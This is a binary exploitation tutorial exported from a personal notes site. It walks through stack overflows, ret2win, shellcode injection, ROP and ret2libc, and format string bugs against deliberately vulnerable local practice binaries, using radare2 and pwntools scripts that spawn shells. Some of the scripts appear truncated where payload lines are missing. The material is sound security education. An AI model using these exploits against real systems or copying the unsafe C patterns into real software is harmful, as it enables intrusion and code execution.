Binary Exploitation
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 1/240
4/10/24, 12:28 PM Binary Exploitation
If you're looking for the binary exploitation notes, you're in the right place! Here I
make notes on most of the things I learn, and also provide vulnerable binaries to
allow you to have a go yourself. Most "common" stack techniques are mentioned
along with some super introductory heap; more will come soon™.
If you're looking for my maths notes, they are split up (with some overlap):
All my other maths notes can be found on Notion here. I realise having it in
multiple locations is annoying, but maths support in Notion is just wayyy better.
Like so much better. Sorry.
Hopefully these two get moulded into one soon
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd
actually be interested in seeing are likely my HackTheBox account or my Twitter (or X, if
you really prefer).
~ Andrej Ljubic
Types
Stack
Introduction
An introduction to binary exploitation
When a new function is called, a memory address in the calling function is pushed to
the stack - this way, the program knows where to return to once the called function
finishes execution. Let's look at a basic binary to show this.
Analysis
There are two files - source.c and vuln ; the latter is an ELF file, which is the
executable format for Linux (it is recommended to follow along with a Virtual
Machine of your own, preferably Linux).
We're gonna use a tool called radare2 to analyse the behaviour of the binary when
functions are called.
$ r2 -d -A vuln
The -d flag runs it under the debugger while -A performs analysis. We can disassemble main with
s main; pdf
s main seeks (moves) to main, while pdf stands for Print Disassembly Function
(literally just disassembles it).
db 0x080491bb
db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply
somewhere which, when reached, pauses the program for you to run other commands.
Now we run dc for debug continue; this just carries on running the file.
It should break before unsafe is called; let's analyse the top of the stack now:
pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first
value here, which is 0xf7efe000 . This value is stored at the top of the stack, as ESP
points to the top of the stack - in this case, that is 0xff984af0 .
Note that the value 0xf7efe000 is effectively arbitrary - it's left over from earlier code
that used that part of the stack. The stack is never wiped, it's just marked as usable, so
before data actually gets put there the value depends entirely on your system.
Let's move one more instruction with ds , debug step, and check the stack again. This
will execute the call sym.unsafe instruction.
Huh, something's been pushed onto the top of the stack - the value 0x080491c0 . This
looks like it's in the binary - but where? Let's look back at the disassembly from before:
[...]
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
[...]
We can see that 0x080491c0 is the memory address of the instruction after the call to
unsafe . Why? This is how the program knows where to return to after unsafe() has
finished.
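The pushed value can be checked with a little arithmetic. This is a minimal Python sketch that uses only the address and raw bytes of the call instruction from the disassembly above; the variable names are just for illustration.

```python
# Address and raw bytes of the call instruction, copied from the disassembly.
call_address = 0x080491bb
call_bytes = bytes.fromhex("e8b2ffffff")

# The return pointer is the address of the instruction straight after the call.
return_pointer = call_address + len(call_bytes)

# An e8 call stores a signed 32-bit displacement relative to that next address.
displacement = int.from_bytes(call_bytes[1:], "little", signed=True)
call_target = return_pointer + displacement

print(hex(return_pointer), hex(call_target))
```

The first value is what ends up on the stack; the second is where the call jumps to, which is sym.unsafe .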
Weaknesses
But as we're interested in binary exploitation, let's see how we can possibly break this.
First, let's disassemble unsafe and break on the ret instruction; ret is the
equivalent of pop eip , which will get the saved return pointer we just analysed on the
stack into the eip register. Then let's continue and spam a bunch of characters into
the input and see how that could affect it.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now let's read the value at the location the return pointer was at previously, which as
we saw was 0xff984aec .
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in
us overwriting more of the stack than the developer expected. The saved return
pointer is also on the stack, meaning we managed to overwrite it. As a result, on the
ret , the value popped into eip won't be in the previous function but rather
0x41414141 . Let's check with ds .
[0x080491aa]> ds
[0x41414141]>
And look at the new prompt - 0x41414141 . Let's run dr eip to make sure that's the
value in eip :
[0x41414141]> dr eip
0x41414141
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes
when we let it run with dc .
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
radare2 is very useful and prints out the address that causes it to crash. If you cause
the program to crash outside of a debugger, it will usually say Segmentation Fault ,
which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when
making your program, usually using other C functions such as fgets() ; gets() is
intrinsically unsafe because it doesn't check the length of the input, meaning that the
presence of gets() is always something you should check out in a program. It is also
possible to give fgets() the wrong parameters, meaning it still takes in too many
characters.
Summary
When a function calls another function, it pushes a return pointer to the stack so the
called function knows where to return. When the called function finishes execution, it
pops the return pointer off the stack again.
Because this value is saved on the stack, just like our local variables, if we write more
characters than the program expects, we can overwrite the value and redirect code
execution to wherever we wish. Functions such as fgets() can prevent such easy
overflow, but you should check how much is actually being read.
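To make the idea concrete, here is a rough Python model of the overflow. It is only a sketch: the 16-byte buffer size is an assumption picked for illustration, and a real frame also holds other saved values between the buffer and the return pointer.

```python
import struct

BUFFER_SIZE = 16  # hypothetical buffer size, chosen only for illustration

# Model the frame as: [ local buffer ][ saved return pointer ]
frame = bytearray(BUFFER_SIZE) + bytearray(struct.pack("<I", 0x080491c0))

def unsafe_copy(frame, data):
    """Copy data into the frame with no length check, much like gets()."""
    frame[0:len(data)] = data

def saved_return_pointer(frame):
    """Read the 4 bytes that sit directly after the buffer."""
    return struct.unpack_from("<I", frame, BUFFER_SIZE)[0]

unsafe_copy(frame, b"A" * 8)                  # fits inside the buffer
before = saved_return_pointer(frame)

unsafe_copy(frame, b"A" * (BUFFER_SIZE + 4))  # 4 bytes too many
after = saved_return_pointer(frame)

print(hex(before), hex(after))
```

The second copy spills four A s over the saved return pointer, which is exactly why eip ended up as 0x41414141 .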
ret2win
The most basic binexp challenge
A ret2win is simply a binary where there is a win() function (or equivalent); once you
successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a
predictable manner - we have to overwrite EIP, but to a specific value of our choice.
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped
into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
The padding can be found using simple trial and error; if we send a variable number of
characters, we can use the Segmentation Fault message, in combination with
radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute
force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger
to make sure the padding is correct.
Now we need to find the address of the flag() function in the binary. This is simple.
$ r2 -d -A vuln
$ afl
[...]
0x080491c3 1 43 sym.flag
[...]
The final piece of the puzzle is to work out how we can send the address we want. If
you think back to the introduction, the A s that we sent became 0x41 - which is the
ASCII code of A . So the solution is simple - let's just find the characters with the
codes 0x08 , 0x04 , 0x91 and 0xc3 .
This is a lot simpler than you might think, because we can specify them in python as
hex:
address = '\x08\x04\x91\xc3'
Putting it Together
Now we know the padding and the value, let's exploit the binary! We can use
pwntools to interface with the binary (check out the pwntools posts for a more in-
depth look).
from pwn import *
p = process('./vuln')
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.sendline(payload)
If you run this, there is one small problem: it won't work. Why? Let's check with a
debugger. We'll put in a pause() to give us time to attach radare2 onto the process.
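from pwn import *
p = process('./vuln')
payload = b'A' * 52
payload += b'\x08\x04\x91\xc3'  # bytes, so it can be appended to the padding
log.info(p.clean())
pause()  # gives us time to attach radare2
p.sendline(payload)
log.info(p.clean())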
Now let's run the script with python3 exploit.py and then open up a new terminal
window.
r2 -d -A $(pidof vuln)
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of
unsafe() and read the value of the return pointer.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
0xc3910408 - look familiar? It's the address we were trying to send over, except the
bytes have been reversed, and the reason for this reversal is endianness. Big-endian
systems store the most significant byte (the byte that contributes most to the value,
here 0x08 ) at the smallest memory address, and this is how we sent them. Little-endian
does the opposite (for a reason), and most binaries you will come across are little-endian.
As far as we're concerned, the bytes are stored in reverse order in little-endian executables.
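The reversal can be reproduced without the binary at all. A small sketch using Python's standard struct module (not pwntools), packing the same address both ways:

```python
import struct

address = 0x080491c3

big = struct.pack(">I", address)     # most significant byte first
little = struct.pack("<I", address)  # least significant byte first

print(big.hex())     # 080491c3
print(little.hex())  # c3910408

# What a little-endian program sees if it is handed the big-endian bytes.
misread = struct.unpack("<I", big)[0]
print(hex(misread))  # 0xc3910408
```

The last line is the value that turned up in the debugger: the right bytes, read in the wrong order.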
radare2 comes with a nice tool called rabin2 for binary analysis:
$ rabin2 -I vuln
[...]
endian little
[...]
The fix is simple - reverse the address (you can also remove the pause() )
payload += '\x08\x04\x91\xc3'[::-1]
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
Unsurprisingly, you're not the first person to have thought "could they possibly make
endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!
payload += '\x08\x04\x91\xc3'[::-1]
becomes
payload += p32(0x080491c3)
The only caveat is that it returns bytes rather than a string, so you have to make the
padding a byte string:
Final Exploit
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
De Bruijn Sequences
The better way to calculate offsets
Again, radare2 comes with a nice command-line tool (called ragg2 ) that can
generate a De Bruijn sequence for us. Let's create one of length 100 .
$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA
The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.
Now we have the pattern, let's just input it in radare2 when prompted for input, make
it crash and then calculate how far along the sequence the EIP is. Simples.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
The address it crashes on is 0x41534141 ; we can use radare2 's in-built wopO
command to work out the offset, passing it the value of eip as wopO `dr eip` .
The backticks mean the dr eip is evaluated first, before the wopO is run on the
result of it.
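The lookup itself is easy to reproduce. The sketch below uses the textbook De Bruijn construction over the uppercase alphabet with 3-character chunks; that choice is an assumption that happens to match the start of the ragg2 output above, and ragg2's own generator may differ further along the sequence.

```python
import string
import struct

def de_bruijn(alphabet, n):
    """Return a de Bruijn sequence in which every length-n chunk is unique."""
    k = len(alphabet)
    a = [0] * (k * n)
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)

pattern = de_bruijn(string.ascii_uppercase, 3)

# The crash address holds 4 bytes of the pattern, stored little-endian.
crash_address = 0x41534141
needle = struct.pack("<I", crash_address).decode("ascii")
offset = pattern.find(needle)

print(pattern[:20], needle, offset)
```

Because every short chunk appears only once, the position of those four characters is the number of padding bytes needed before the return pointer.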
Shellcode
Running your own code
In real exploits, it's not particularly likely that you will have a win() function lying
around - shellcode is a way to run your own instructions, giving you the ability to run
arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary;
once we input it, we overwrite the return pointer to hijack code execution and point at
our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what
it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture
used in most computers today) does not differentiate between data and instructions -
it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore,
even though our input is data, the computer doesn't know that - and we can use that to
our advantage.
Disabling ASLR
Again, you should never run commands if you don't know what they do
Let's debug vuln() using radare2 and work out where in memory the buffer starts;
this is where we want to point the return pointer to.
$ r2 -d -A vuln
This value that gets printed out is a local variable - due to its size, it's fairly likely to be
the buffer. Let's set a breakpoint just after gets() and find the exact address.
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn
sequence as explained in the previous blog post.
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
In order for the shellcode to be correct, we're going to set context.binary to our
binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us
with working shellcode.
context.binary = ELF('./vuln')
p = process()
We can use just process() because once context.binary is set, pwntools assumes that
is the binary to run.
Yup, that's it. Now let's send it off and use p.interactive() , which enables us to
communicate to the shell.
log.info(p.clean())
p.sendline(payload)
p.interactive()
If you're getting an EOFError , print out the shellcode and try to find it in memory - the
stack address may be wrong
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
Final Exploit
context.binary = ELF('./vuln')
p = process()
log.info(p.clean())
p.sendline(payload)
p.interactive()
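The payload is built from the two values found earlier: the 312-byte offset and the buffer address 0xffffcfb4 . As a rough sketch of that layout, here it is with the standard struct module and a placeholder in place of real shellcode (the placeholder bytes are an assumption, and pwntools would normally generate the shellcode for you):

```python
import struct

OFFSET = 312               # padding up to the saved return pointer (from wopO)
BUFFER_ADDR = 0xffffcfb4   # start of the buffer (from the px output)

# Placeholder standing in for real shellcode; 0xcc is the x86 int3 breakpoint.
shellcode = b"\xcc" * 24

payload = shellcode.ljust(OFFSET, b"A")    # shellcode first, then padding
payload += struct.pack("<I", BUFFER_ADDR)  # return pointer -> start of buffer

print(len(payload), payload[-4:].hex())
```

The shellcode sits at the very start of the buffer, so pointing the return pointer at the buffer address runs it.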
Summary
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. Which makes
them very useful for shellcode exploits, because all they will do is run the next
instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of
them, it'll simply keep executing NOPs until it reaches our actual shellcode. This
allows us a greater margin of error as a shift of a few bytes forward or backwards won't
really affect it, it'll just run a different number of NOP instructions - which have the
same end result of running the shellcode. This padding with NOPs is often called a NOP
slide or NOP sled, since the EIP is essentially sliding down them.
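A toy model shows why the landing point stops mattering. This sketch assumes x86, where a NOP is the single byte \x90 , and uses placeholder bytes instead of real shellcode; the sled length of 32 is arbitrary.

```python
NOP = b"\x90"
shellcode = b"\xcc" * 8   # placeholder bytes standing in for real shellcode
sled = NOP * 32
memory = sled + shellcode

def slide(memory, start):
    """Follow NOPs from start; return the index of the first non-NOP byte."""
    pc = start
    while memory[pc:pc + 1] == NOP:
        pc += 1
    return pc

# Any landing point inside the sled ends up at the start of the shellcode.
landings = {start: slide(memory, start) for start in (0, 10, 16, 31)}
print(landings)
```

Every starting offset finishes at index 32, the first byte of the shellcode.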
The NOP instruction actually used to stand for XCHG EAX, EAX , which does effectively
nothing. You can read a bit more about it on this StackOverflow question.
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust
your previous exploit as the buffer location may be different.
context.binary = ELF('./vuln')
p = process()
log.info(p.clean())
p.sendline(payload)
p.interactive()
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive
unexpected errors padding with NOPs but the shellcode worked before, try reducing the
length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90 in certain architectures, and if you need others you can
use pwntools:
nop = asm(shellcraft.nop())
32- vs 64-bit
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing
you would need to change is switch out the p32() for p64() as the memory
addresses are longer.
The real difference between the two, however, is the way you pass parameters to
functions (which we'll be looking at much closer soon); in 32-bit, all parameters are
pushed to the stack before the function is called. In 64-bit, however, the first 6 are
stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling
convention. Note that different Operating Systems also have different calling
conventions.
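As a quick illustration of the difference, here is a sketch that says where each argument would go. It assumes the Linux (System V) convention for 64-bit and only covers integer or pointer arguments; the function name is made up for this example.

```python
SYSV_ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_arguments(args, bits):
    """Return (registers, stack) showing where integer arguments end up."""
    args = list(args)
    if bits == 32:
        return {}, args  # 32-bit: everything goes on the stack
    registers = dict(zip(SYSV_ARG_REGISTERS, args))
    # Anything past the sixth argument spills onto the stack.
    return registers, args[len(SYSV_ARG_REGISTERS):]

print(place_arguments([0xdeadbeef], 32))
print(place_arguments([0xdeadbeef], 64))
print(place_arguments([1, 2, 3, 4, 5, 6, 7, 8], 64))
```

For exploitation this means that on 64-bit you need a way to load registers, not just a way to write to the stack.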
No eXecute
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their
own instructions into the program. The NX bit, which stands for No eXecute, defines
areas of memory as either instructions or data. This means that your input will be
stored as data, and any attempt to run it as instructions will crash the program,
effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-
Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
Checking for NX
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ rabin2 -I vuln
[...]
nx false
[...]
Return-Oriented Programming
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the
binary itself in such a way to do what you wish. This often involves passing parameters
to functions already present within libc , such as system - if you can find the location
of a command, such as cat flag.txt , and then pass it as a parameter to system , it
will execute that command and return the output. A more dangerous command is
/bin/sh , which when run by system gives the attacker a shell much like the
shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call
functions, we first have to understand how to pass parameters to them.
Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs
One Parameter
Source
Let's have a quick look at the source:
#include <stdio.h>
int main() {
vuln(0xdeadbeef);
vuln(0xdeadc0de);
}
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Nice!
Not nice!
Analysing 32-bit
$ r2 -d -A vuln-32
$ s main; pdf
push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln
We literally push the parameter to the stack before calling the function. Let's break
on sym.vuln .
[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c
The first value there is the return pointer that we talked about before - the second,
however, is the parameter. This makes sense because the return pointer gets pushed
during the call , so it should be at the top of the stack. Now let's disassemble
sym.vuln .
Here I'm showing the full output of the command because a lot of it is relevant.
radare2 does a great job of detecting local variables - as you can see at the top, there
So now we know, when there's one parameter, it gets pushed to the stack so that the
stack looks like:
Analysing 64-bit
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in
the disassembly here it's edi , but edi is just the lower 32 bits of rdi , and the
parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again
we can check rdi with the command
dr rdi
[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack
and in ROP is placed right after the function address
Multiple Parameters
Source
#include <stdio.h>
int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}
32-bit
We've seen the full disassembly of an almost identical binary, so I'll only isolate the
important parts.
It's just as simple - push them in reverse order of how they're passed in. The reverse
order becomes helpful when you db sym.vuln and print out the stack.
[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d
So it becomes quite clear how more parameters are placed on the stack:
64-bit
So as well as rdi , we also load values into rsi and rdx (or, in this case, their lower 32 bits).
#include <stdio.h>
int main() {
vuln(0xdeadbeefc0ded00d);
}
movabs is how the assembler encodes a mov of a full 64-bit immediate value into a
register - treat it as if it's a mov .
Gadgets
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret .
We can manipulate the ret of these gadgets in such a way as to string together a
large chain of them to do what we want.
Example
Let's for a minute pretend the stack looks like this during the execution of a
pop rdi; ret gadget.
What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the
stack during the pop rdi . Once the pop occurs, rsp moves:
And since ret is equivalent to pop rip , 0x5655576724 gets moved into rip . Note
how the stack is laid out for this.
Utilising Gadgets
When we overwrite the return pointer, we overwrite the value pointed at by rsp .
Once that value is popped, it points at the next value at the stack - but wait. We can
overwrite the next value in the stack.
Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop
0x100 into rdi then jump to flag() . Let's step-by-step the execution.
On the original ret , which we overwrite the return pointer for, we pop the gadget
address in. Now rip moves to point to the gadget, and rsp moves to the next
memory address.
rsp moves to the 0x100 ; rip to the pop rdi . Now when we pop, 0x100 gets
moved into rdi .
RSP moves onto the next item on the stack, the address of flag() . The ret is
executed and flag() is called.
Summary
Essentially, if the gadget pops values from the stack, simply place those values
afterwards (including the pop rip in ret ). If we want to pop 0x10 into rdi and
then jump to 0x16 , our payload would look like this:
Note if you have multiple pop instructions, you can just add more values.
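The layout and the way it gets consumed can be sketched in a few lines of Python. The gadget address below is hypothetical (it is not taken from any binary in these notes), and the "CPU" is just a list being popped from the front.

```python
import struct

POP_RDI_RET = 0x401234   # hypothetical gadget address, for illustration only

# What lands on the stack, starting at the overwritten return pointer.
payload = struct.pack("<QQQ", POP_RDI_RET, 0x10, 0x16)

# Tiny model of the CPU walking the chain, one 8-byte slot at a time.
stack = list(struct.unpack("<QQQ", payload))
regs = {"rip": None, "rdi": None}

regs["rip"] = stack.pop(0)   # original ret: pops the gadget address into rip
regs["rdi"] = stack.pop(0)   # pop rdi: takes the next value, 0x10
regs["rip"] = stack.pop(0)   # the gadget's own ret: pops 0x16 into rip

print({name: hex(value) for name, value in regs.items()})
```

Each extra pop in a gadget simply consumes one more 8-byte slot, so a longer gadget needs one more value placed after its address.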
We use rdi as an example because, if you remember, that's the register for the first
parameter in 64-bit. This means control of this register using this gadget is important.
Finding Gadgets
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jm
[...]
exploiting_with_params.zip
5KB archive
32-bit
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return
address and the parameters.
Everything after the address of flag() will be part of the stack frame for the next
function as it is expected to be there - just instead of using push instructions we just
overwrote them manually.
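As a rough sketch of that layout, using the standard struct module in place of pwntools: every concrete number here (the padding, the address of flag() and the two parameter values) is a made-up placeholder, so substitute the values for your own binary.

```python
import struct

PADDING = 52                        # hypothetical offset to the return pointer
FLAG_ADDR = 0x080491c3              # hypothetical address of flag()
PARAMS = (0xdeadc0de, 0xc0ded00d)   # hypothetical argument values

payload = b"A" * PADDING
payload += struct.pack("<I", FLAG_ADDR)  # overwrites the saved return pointer
payload += struct.pack("<I", 0x0)        # return address that flag() will see
for param in PARAMS:                     # then the parameters, first one first
    payload += struct.pack("<I", param)

print(payload[PADDING:].hex())
```

The dummy return address matters: without it, flag() would treat the first parameter as its return pointer and read its arguments from one slot too far along.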
p = process('./vuln-32')
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
64-bit
Same logic, except we have to utilise the gadgets we talked about previously to fill the
required registers (in this case rdi and rsi as we have two parameters).
p = process('./vuln-64')
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
ret2libc
The standard ROP exploit
A ret2libc is based off the system function found within the C library. This function
executes anything passed to it making it the best target. Another thing found within
libc is the string /bin/sh ; if you pass this string to system , it will pop a shell.
And that is the entire basis of it - passing /bin/sh as a parameter to system . Doesn't
sound too bad, right?
Disabling ASLR
To start with, we are going to disable ASLR. ASLR randomises the location of libc in
memory, meaning we cannot (without other steps) work out the location of system
and /bin/sh . To understand the general theory, we will start with it disabled.
Manual Exploitation
Fortunately Linux has a command called ldd for dynamic linking. If we run it on our
compiled ELF file, it'll tell us the libraries it uses and their base addresses.
$ ldd vuln-32
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
/lib/ld-linux.so.2 (0xf7fd3000)
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem
- it just means you have a different libc version. Make sure you use your values.
To call system, we obviously need its location in memory. We can use the readelf
command for this.
The -s flag tells readelf to search for symbols, for example functions. Here we can
find the offset of system from libc base is 0x44f00 .
Since /bin/sh is just a string, we can use strings on the dynamic library we just
found with ldd . Note that when passing strings as parameters you need to pass a
pointer to the string, not the hex representation of the string, because that's how C
expects it.
-a tells it to scan the entire file; -t x tells it to output the offset in hex.
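With ASLR off, the real addresses are just the libc base plus each offset. A short sketch of the arithmetic and of the 32-bit chain layout, using the base from the ldd output and the offsets used in these notes (yours will likely differ); the padding before the chain is left out because it depends on the binary.

```python
import struct

libc_base = 0xf7dc2000            # from ldd
system = libc_base + 0x44f00      # offset of system from readelf
binsh = libc_base + 0x18c32b      # offset of "/bin/sh" from strings

# 32-bit layout after the padding: function, its return address, its argument.
chain = struct.pack("<III", system, 0x0, binsh)

print(hex(system), hex(binsh), chain.hex())
```

Note that the argument is the address of the string, not the string itself.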
32-bit Exploit
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
p.clean()
p.sendline(payload)
p.interactive()
64-bit Exploit
Repeat the process with the libc linked to the 64-bit binary (should be called
something like /lib/x86_64-linux-gnu/libc.so.6 ).
Note that instead of passing the parameter in after the return pointer, you will have to
use a pop rdi; ret gadget to put it into the RDI register.
[...]
0x00000000004011cb : pop rdi ; ret
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
p.clean()
p.sendline(payload)
p.interactive()
# 32-bit
from pwn import *
p.clean()
p.sendline(payload)
p.interactive()
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them
here.
Stack Alignment
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works
perfectly locally but fails remotely - or even fails when you try to use the provided LIBC
version rather than your local one. This arises due to something called stack alignment.
Essentially the x86-64 ABI (application binary interface) guarantees 16-byte alignment
on a call instruction. LIBC takes advantage of this and uses SSE data transfer
instructions to optimise execution; system in particular utilises instructions such as
movaps .
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 -
the ROP chain will fail on system .
The fix is simple - in your ROP chain, before the call to system , place a single ret
gadget:
[...]
rop.raw(POP_RDI)
rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack
rop.raw(system)
This works because the extra ret pops one more value off the stack, moving RSP
forward by 8 bytes and aligning it.
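The arithmetic behind the fix is small enough to check by hand. This sketch only models RSP as a number, with a hypothetical starting value that is off by 8; it does not model system itself.

```python
def rsp_after_rets(rsp, count):
    """Each ret pops one 8-byte value, moving RSP up by 8."""
    return rsp + 8 * count

rsp = 0x7ffc0000e008   # hypothetical RSP value, misaligned by 8

misaligned = rsp % 16                    # 8
realigned = rsp_after_rets(rsp, 1) % 16  # 0

print(misaligned, realigned)
```

Since RSP only ever moves in steps of 8 during a ROP chain, it is always either aligned or off by exactly 8, so one extra ret is enough to flip it.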
A format string bug is dangerous and easily exploitable. If manipulated correctly, you
can leverage it to perform powerful actions such as reading from and writing to
arbitrary memory locations.
Why it exists
In C, certain functions can take "format specifiers" within strings. Let's look at an
example:
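A minimal stand-in, assuming Python's printf-style % operator, which treats these three specifiers the same way C's printf does (the value 1205 is the one used in the output shown here):

```python
value = 1205

lines = [
    "Decimal: %d" % value,
    "Float: %f" % value,
    "Hex: 0x%x" % value,
]
print("\n".join(lines))

# Unlike C, Python refuses to format when arguments are missing.
try:
    "%x %x" % (value,)
    missing_args_error = None
except TypeError as exc:
    missing_args_error = str(exc)
print(missing_args_error)
```

The second half is where the two languages part ways: Python raises an error when there are too few arguments, while C's printf has no such check.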
As expected, we get
Decimal: 1205
Float: 1205.000000
Hex: 0x4b5
So, it replaced %d with the value, %f with the float value and %x with the hex
representation.
What happens, however, if we don't have enough arguments for all the format
specifiers?
The key here is that printf expects as many parameters as format string specifiers,
and in 32-bit it grabs these parameters from the stack. If there aren't enough
parameters on the stack, it'll just grab the next values - essentially leaking values off
the stack. And that's what makes it so dangerous.
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is
when C code takes user-provided input and prints it out using printf .
#include <stdio.h>
int main(void) {
char buffer[30];
gets(buffer);
printf(buffer);
return 0;
}
$ ./test
yes
yes
$ ./test
%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520
printf reads values off the stack and prints them, because the developer never expected
the input to contain format string specifiers.
Choosing Offsets
The 1$ between the % and the conversion character tells printf to use the first parameter.
However, this also means that attackers can read a value at an arbitrary offset from the top
of the stack - say we know there is a canary at the 6th %p - instead of sending
%p %p %p %p %p %p we can just send %6$p . This allows us to be much more efficient.
Arbitrary Reads
In C, when you want to use a string you use a pointer to the start of the string - this is
essentially a value that represents a memory address. So when you use the %s format
specifier, it's the pointer that gets passed to it. That means instead of reading a value
off the stack, you read the value at the memory address it points to.
Now this is all very interesting - if you can find a value on the stack that happens to
correspond to where you want to read, that is. But what if we could specify where we
want to read? Well... we can.
$ ./test
%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825
